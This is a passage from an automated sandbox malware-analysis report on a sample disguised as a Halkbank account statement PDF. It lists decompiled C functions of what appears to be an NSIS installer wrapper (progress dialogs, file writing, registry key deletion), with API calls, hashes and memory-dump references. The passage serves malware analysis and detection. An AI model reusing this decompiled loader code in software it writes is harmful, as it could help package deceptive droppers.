                                          • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                          Similarity
                                          • API ID: File$Pointer$ByteCharMultiWide$Read
                                          • String ID: 9
                                          • API String ID: 163830602-2366072709
                                          • Opcode ID: c494a9c5f1831dca55446a6dfc25bb45b63b896379fbbdb0ec38153142a3ac1c
                                          • Instruction ID: 581cf2785626502de532f206a1de9da9d9b8d20bcd24121b7f7bd1133decb9a2
                                          • Opcode Fuzzy Hash: c494a9c5f1831dca55446a6dfc25bb45b63b896379fbbdb0ec38153142a3ac1c
                                          • Instruction Fuzzy Hash: CE51FB75D00219AADF20EF95CA88AAEBB75FF04304F50417BE541B62D4D7B49D82CB58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004068EF Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 69COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 91%
                                          			E004068EF(WCHAR* _a4) {
				short _t5;
				short _t7;
				WCHAR* _t19;
				WCHAR* _t20;
				WCHAR* _t21;

				_t20 = _a4;
				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
					_t20 =  &(_t20[4]);
				}
				if( *_t20 != 0 && E00405FAE(_t20) != 0) {
					_t20 =  &(_t20[2]);
				}
				_t5 =  *_t20;
				_t21 = _t20;
				_t19 = _t20;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((short*)(E00405F64(L"*?|<>/\":", _t5))) == 0) {
							E00406113(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
							_t19 = CharNextW(_t19);
						}
						_t20 = CharNextW(_t20);
						_t5 =  *_t20;
					} while (_t5 != 0);
				}
				 *_t19 =  *_t19 & 0x00000000;
				while(1) {
					_push(_t19);
					_push(_t21);
					_t19 = CharPrevW();
					_t7 =  *_t19;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t19 =  *_t19 & 0x00000000;
					if(_t21 < _t19) {
						continue;
					}
					break;
				}
				return _t7;
			}








                                          0x004068f1
                                          0x004068fa
                                          0x00406911
                                          0x00406911
                                          0x00406918
                                          0x00406924
                                          0x00406924
                                          0x00406927
                                          0x0040692a
                                          0x0040692f
                                          0x00406931
                                          0x0040693a
                                          0x0040693e
                                          0x0040695b
                                          0x00406963
                                          0x00406963
                                          0x00406968
                                          0x0040696a
                                          0x0040696d
                                          0x00406972
                                          0x00406973
                                          0x00406977
                                          0x00406977
                                          0x00406978
                                          0x0040697f
                                          0x00406981
                                          0x00406988
                                          0x00000000
                                          0x00000000
                                          0x00406990
                                          0x00406996
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00406996
                                          0x0040699b

                                          APIs
                                          • CharNextW.USER32(?,*?|<>/":,00000000,00000000,74D0FAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406952
                                          • CharNextW.USER32(?,?,?,00000000,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406961
                                          • CharNextW.USER32(?,00000000,74D0FAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406966
                                          • CharPrevW.USER32(?,?,74D0FAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406979
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.259056765.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.259049654.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259066123.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259109034.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                          Similarity
                                          • API ID: Char$Next$Prev
                                          • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                                          • API String ID: 589700163-2982765560
                                          • Opcode ID: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
                                          • Instruction ID: d28fb8c2eefe6f61a155ceb01790bbf8b21f4710aa7989e54d8eeb8481a577c9
                                          • Opcode Fuzzy Hash: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
                                          • Instruction Fuzzy Hash: 2611089580061295DB303B18CC40BB762F8AF99B50F12403FE98A776C1E77C4C9286BD
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040302E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E0040302E(intOrPtr _a4) {
				short _v132;
				long _t6;
				struct HWND__* _t7;
				struct HWND__* _t15;

				if(_a4 != 0) {
					_t15 =  *0x420efc;
					if(_t15 != 0) {
						_t15 = DestroyWindow(_t15);
					}
					 *0x420efc = 0;
					return _t15;
				}
				if( *0x420efc != 0) {
					return E00406A71(0);
				}
				_t6 = GetTickCount();
				if(_t6 >  *0x42a26c) {
					if( *0x42a268 == 0) {
						_t7 = CreateDialogParamW( *0x42a260, 0x6f, 0, E00402F93, 0);
						 *0x420efc = _t7;
						return ShowWindow(_t7, 5);
					}
					if(( *0x42a314 & 0x00000001) != 0) {
						wsprintfW( &_v132, L"... %d%%", E00403012());
						return E004056CA(0,  &_v132);
					}
				}
				return _t6;
			}







                                          0x0040303d
                                          0x0040303f
                                          0x00403046
                                          0x00403049
                                          0x00403049
                                          0x0040304f
                                          0x00000000
                                          0x0040304f
                                          0x0040305d
                                          0x00000000
                                          0x00403060
                                          0x00403067
                                          0x00403073
                                          0x0040307b
                                          0x004030b9
                                          0x004030c2
                                          0x00000000
                                          0x004030c7
                                          0x00403084
                                          0x00403095
                                          0x00000000
                                          0x004030a3
                                          0x00403084
                                          0x004030cf

                                          APIs
                                          • DestroyWindow.USER32(?,00000000), ref: 00403049
                                          • GetTickCount.KERNEL32 ref: 00403067
                                          • wsprintfW.USER32 ref: 00403095
                                            • Part of subcall function 004056CA: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                            • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                            • Part of subcall function 004056CA: lstrcatW.KERNEL32(00422728,004030A8), ref: 00405725
                                            • Part of subcall function 004056CA: SetWindowTextW.USER32(00422728,00422728), ref: 00405737
                                            • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                            • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                            • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                          • CreateDialogParamW.USER32 ref: 004030B9
                                          • ShowWindow.USER32(00000000,00000005), ref: 004030C7
                                            • Part of subcall function 00403012: MulDiv.KERNEL32(?,00000064,?), ref: 00403027
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.259056765.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.259049654.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259066123.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259109034.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                          Similarity
                                          • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                          • String ID: ... %d%%
                                          • API String ID: 722711167-2449383134
                                          • Opcode ID: a65563718f57099a27635650194dd277da09fbe66beefc8d93bb4be83c5e7891
                                          • Instruction ID: 5af6bf9b0b70cf9307c1258d0e5a667b07be53d22b58a3258066d7aee54b172b
                                          • Opcode Fuzzy Hash: a65563718f57099a27635650194dd277da09fbe66beefc8d93bb4be83c5e7891
                                          • Instruction Fuzzy Hash: E8018E70553614DBC7317F60AE08A5A3EACAB00F06F54457AF841B21E9DAB84645CBAE
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00404F7F Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00404F7F(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageW(_t28, 0x113e, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














                                          0x00404f8d
                                          0x00404f9a
                                          0x00404fa0
                                          0x00404fde
                                          0x00404fde
                                          0x00404fed
                                          0x00404ff4
                                          0x00000000
                                          0x00404ff6
                                          0x00404fa2
                                          0x00404fb1
                                          0x00404fb9
                                          0x00404fbc
                                          0x00404fce
                                          0x00404fd4
                                          0x00404fdb
                                          0x00000000
                                          0x00404fdb
                                          0x00000000

                                          APIs
                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404F9A
                                          • GetMessagePos.USER32 ref: 00404FA2
                                          • ScreenToClient.USER32 ref: 00404FBC
                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404FCE
                                          • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404FF4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.259056765.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.259049654.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259066123.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259109034.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                          Similarity
                                          • API ID: Message$Send$ClientScreen
                                          • String ID: f
                                          • API String ID: 41195575-1993550816
                                          • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                          • Instruction ID: ce4c7d6d39dceca23aa6ebdb29af7737867007859e7bede0b388bd4d525dd41f
                                          • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                          • Instruction Fuzzy Hash: 3C014C71940219BADB00DBA4DD85BFEBBB8AF54711F10012BBB50B61C0D6B49A058BA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00402F93 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00402F93(struct HWND__* _a4, intOrPtr _a8) {
				short _v132;
				void* _t11;
				WCHAR* _t19;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t11 = E00403012();
					_t19 = L"unpacking data: %d%%";
					if( *0x42a270 == 0) {
						_t19 = L"verifying installer: %d%%";
					}
					wsprintfW( &_v132, _t19, _t11);
					SetWindowTextW(_a4,  &_v132);
					SetDlgItemTextW(_a4, 0x406,  &_v132);
				}
				return 0;
			}






                                          0x00402fa3
                                          0x00402fb1
                                          0x00402fb7
                                          0x00402fb7
                                          0x00402fc5
                                          0x00402fc7
                                          0x00402fd3
                                          0x00402fd8
                                          0x00402fda
                                          0x00402fda
                                          0x00402fe5
                                          0x00402ff5
                                          0x00403007
                                          0x00403007
                                          0x0040300f

                                          APIs
                                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB1
                                          • wsprintfW.USER32 ref: 00402FE5
                                          • SetWindowTextW.USER32(?,?), ref: 00402FF5
                                          • SetDlgItemTextW.USER32 ref: 00403007
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.259056765.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.259049654.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259066123.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259109034.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                          Similarity
                                          • API ID: Text$ItemTimerWindowwsprintf
                                          • String ID: unpacking data: %d%%$verifying installer: %d%%
                                          • API String ID: 1451636040-1158693248
                                          • Opcode ID: b65fa6b26e28fa793ab4966251e07a6fe500b79f9b1e2f9c66e5bc42e84335f7
                                          • Instruction ID: 34ad84b97f90b05cf42cbebec4ee1aaae98efe268bf46a139428006d78f28757
                                          • Opcode Fuzzy Hash: b65fa6b26e28fa793ab4966251e07a6fe500b79f9b1e2f9c66e5bc42e84335f7
                                          • Instruction Fuzzy Hash: 25F0497050020DABEF246F60DD49BEA3B69FB00309F00803AFA05B51D0DFBD9A559F59
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00402950 Relevance: 9.1, APIs: 6, Instructions: 91memoryfileCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 93%
                                          			E00402950(void* __ebx) {
				WCHAR* _t26;
				void* _t29;
				long _t37;
				void* _t49;
				void* _t52;
				void* _t54;
				void* _t56;
				void* _t59;
				void* _t60;
				void* _t61;

				_t49 = __ebx;
				_t52 = 0xfffffd66;
				_t26 = E00402DA6(0xfffffff0);
				_t55 = _t26;
				 *(_t61 - 0x40) = _t26;
				if(E00405FAE(_t26) == 0) {
					E00402DA6(0xffffffed);
				}
				E00406133(_t55);
				_t29 = E00406158(_t55, 0x40000000, 2);
				 *(_t61 + 8) = _t29;
				if(_t29 != 0xffffffff) {
					 *(_t61 - 0x38) =  *(_t61 - 0x2c);
					if( *(_t61 - 0x28) != _t49) {
						_t37 =  *0x42a274;
						 *(_t61 - 0x44) = _t37;
						_t54 = GlobalAlloc(0x40, _t37);
						if(_t54 != _t49) {
							E004035F8(_t49);
							E004035E2(_t54,  *(_t61 - 0x44));
							_t59 = GlobalAlloc(0x40,  *(_t61 - 0x28));
							 *(_t61 - 0x10) = _t59;
							if(_t59 != _t49) {
								E00403371(_t51,  *(_t61 - 0x2c), _t49, _t59,  *(_t61 - 0x28));
								while( *_t59 != _t49) {
									_t51 =  *_t59;
									_t60 = _t59 + 8;
									 *(_t61 - 0x3c) =  *_t59;
									E00406113( *((intOrPtr*)(_t59 + 4)) + _t54, _t60,  *_t59);
									_t59 = _t60 +  *(_t61 - 0x3c);
								}
								GlobalFree( *(_t61 - 0x10));
							}
							E0040620A( *(_t61 + 8), _t54,  *(_t61 - 0x44));
							GlobalFree(_t54);
							 *(_t61 - 0x38) =  *(_t61 - 0x38) | 0xffffffff;
						}
					}
					_t52 = E00403371(_t51,  *(_t61 - 0x38),  *(_t61 + 8), _t49, _t49);
					CloseHandle( *(_t61 + 8));
				}
				_t56 = 0xfffffff3;
				if(_t52 < _t49) {
					_t56 = 0xffffffef;
					DeleteFileW( *(_t61 - 0x40));
					 *((intOrPtr*)(_t61 - 4)) = 1;
				}
				_push(_t56);
				E00401423();
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t61 - 4));
				return 0;
			}













                                          0x00402950
                                          0x00402952
                                          0x00402957
                                          0x0040295c
                                          0x0040295f
                                          0x00402969
                                          0x0040296d
                                          0x0040296d
                                          0x00402973
                                          0x00402980
                                          0x00402988
                                          0x0040298b
                                          0x00402997
                                          0x0040299a
                                          0x004029a0
                                          0x004029ae
                                          0x004029b3
                                          0x004029b7
                                          0x004029ba
                                          0x004029c3
                                          0x004029cf
                                          0x004029d3
                                          0x004029d6
                                          0x004029e0
                                          0x004029ff
                                          0x004029e7
                                          0x004029ec
                                          0x004029f4
                                          0x004029f7
                                          0x004029fc
                                          0x004029fc
                                          0x00402a06
                                          0x00402a06
                                          0x00402a13
                                          0x00402a19
                                          0x00402a1f
                                          0x00402a1f
                                          0x004029b7
                                          0x00402a33
                                          0x00402a35
                                          0x00402a35
                                          0x00402a3f
                                          0x00402a40
                                          0x00402a44
                                          0x00402a48
                                          0x00402a4e
                                          0x00402a4e
                                          0x00402a55
                                          0x004022f1
                                          0x00402c2d
                                          0x00402c39

                                          APIs
                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
                                          • GlobalFree.KERNEL32 ref: 00402A06
                                          • GlobalFree.KERNEL32 ref: 00402A19
                                          • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A35
                                          • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.259056765.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.259049654.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259066123.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259109034.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                          Similarity
                                          • API ID: Global$AllocFree$CloseDeleteFileHandle
                                          • String ID:
                                          • API String ID: 2667972263-0
                                          • Opcode ID: cc682eb677fc0cdddcbf9664361c627099a0f91e8e9c012db3e8b517a211182c
                                          • Instruction ID: 78b93316678d616cb595922dcd62a83f4062aa2fb33f08fb70827f98fa9650ab
                                          • Opcode Fuzzy Hash: cc682eb677fc0cdddcbf9664361c627099a0f91e8e9c012db3e8b517a211182c
                                          • Instruction Fuzzy Hash: E131B171D00124BBCF216FA9CE89D9EBE79AF09364F10023AF461762E1CB794D429B58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00404E71 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 77%
                                          			E00404E71(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v68;
				char _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t23;
				signed int _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t44;
				signed int _t46;
				signed int _t50;
				signed int _t52;
				signed int _t53;
				signed int _t55;

				_t23 = _a16;
				_t53 = _a12;
				_t44 = 0xffffffdc;
				if(_t23 == 0) {
					_push(0x14);
					_pop(0);
					_t24 = _t53;
					if(_t53 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t44 = 0xffffffdd;
					}
					if(_t53 < 0x400) {
						_t44 = 0xffffffde;
					}
					if(_t53 < 0xffff3333) {
						_t52 = 0x14;
						asm("cdq");
						_t24 = 1 / _t52 + _t53;
					}
					_t25 = _t24 & 0x00ffffff;
					_t55 = _t24 >> 0;
					_t46 = 0xa;
					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
				} else {
					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
					_t50 = 0;
				}
				_t31 = E004066A5(_t44, _t50, _t55,  &_v68, 0xffffffdf);
				_t33 = E004066A5(_t44, _t50, _t55,  &_v132, _t44);
				_t34 = E004066A5(_t44, _t50, 0x423748, 0x423748, _a8);
				wsprintfW(_t34 + lstrlenW(0x423748) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
				return SetDlgItemTextW( *0x429238, _a4, 0x423748);
			}



















                                          0x00404e7a
                                          0x00404e7f
                                          0x00404e87
                                          0x00404e88
                                          0x00404e95
                                          0x00404e9d
                                          0x00404e9e
                                          0x00404ea0
                                          0x00404ea2
                                          0x00404ea4
                                          0x00404ea7
                                          0x00404ea7
                                          0x00404eae
                                          0x00404eb4
                                          0x00404eb4
                                          0x00404ebb
                                          0x00404ec2
                                          0x00404ec5
                                          0x00404ec8
                                          0x00404ec8
                                          0x00404ecc
                                          0x00404edc
                                          0x00404ede
                                          0x00404ee1
                                          0x00404e8a
                                          0x00404e8a
                                          0x00404e91
                                          0x00404e91
                                          0x00404ee9
                                          0x00404ef4
                                          0x00404f0a
                                          0x00404f1b
                                          0x00404f37

                                          APIs
                                          • lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F12
                                          • wsprintfW.USER32 ref: 00404F1B
                                          • SetDlgItemTextW.USER32 ref: 00404F2E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.259056765.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.259049654.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259066123.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259109034.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                          Similarity
                                          • API ID: ItemTextlstrlenwsprintf
                                          • String ID: %u.%u%s%s$H7B
                                          • API String ID: 3540041739-107966168
                                          • Opcode ID: 9c55475845004576d56970086a3160dc1853a6ea3782dd039902276dcfc99cf4
                                          • Instruction ID: 20619224473e8c08b4fba53027c62ddcf1c3fef784a2ba69f514aa474de30786
                                          • Opcode Fuzzy Hash: 9c55475845004576d56970086a3160dc1853a6ea3782dd039902276dcfc99cf4
                                          • Instruction Fuzzy Hash: 1A11D8736041283BDB00A5ADDC45E9F3298AB81338F150637FA26F61D1EA79882182E8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00402EA9 Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 48%
                                          			E00402EA9(void* __eflags, void* _a4, short* _a8, signed int _a12) {
				void* _v8;
				int _v12;
				short _v536;
				void* _t27;
				signed int _t33;
				intOrPtr* _t35;
				signed int _t45;
				signed int _t46;
				signed int _t47;

				_t46 = _a12;
				_t47 = _t46 & 0x00000300;
				_t45 = _t46 & 0x00000001;
				_t27 = E004064D5(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
				if(_t27 == 0) {
					if((_a12 & 0x00000002) == 0) {
						L3:
						_push(0x105);
						_push( &_v536);
						_push(0);
						while(RegEnumKeyW(_v8, ??, ??, ??) == 0) {
							__eflags = _t45;
							if(__eflags != 0) {
								L10:
								RegCloseKey(_v8);
								return 0x3eb;
							}
							_t33 = E00402EA9(__eflags, _v8,  &_v536, _a12);
							__eflags = _t33;
							if(_t33 != 0) {
								break;
							}
							_push(0x105);
							_push( &_v536);
							_push(_t45);
						}
						RegCloseKey(_v8);
						_t35 = E00406A35(3);
						if(_t35 != 0) {
							return  *_t35(_a4, _a8, _t47, 0);
						}
						return RegDeleteKeyW(_a4, _a8);
					}
					_v12 = 0;
					if(RegEnumValueW(_v8, 0,  &_v536,  &_v12, 0, 0, 0, 0) != 0x103) {
						goto L10;
					}
					goto L3;
				}
				return _t27;
			}












                                          0x00402eb4
                                          0x00402ebd
                                          0x00402ec6
                                          0x00402ed2
                                          0x00402edb
                                          0x00402ee5
                                          0x00402f0a
                                          0x00402f10
                                          0x00402f15
                                          0x00402f16
                                          0x00402f46
                                          0x00402f1f
                                          0x00402f21
                                          0x00402f71
                                          0x00402f74
                                          0x00000000
                                          0x00402f7a
                                          0x00402f30
                                          0x00402f35
                                          0x00402f37
                                          0x00000000
                                          0x00000000
                                          0x00402f3f
                                          0x00402f44
                                          0x00402f45
                                          0x00402f45
                                          0x00402f52
                                          0x00402f5a
                                          0x00402f61
                                          0x00000000
                                          0x00402f8a
                                          0x00000000
                                          0x00402f69
                                          0x00402ef5
                                          0x00402f08
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00402f08
                                          0x00402f90

                                          APIs
                                          • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402EFD
                                          • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
                                          • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F52
                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
                                          • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F74
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.259056765.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.259049654.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259066123.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
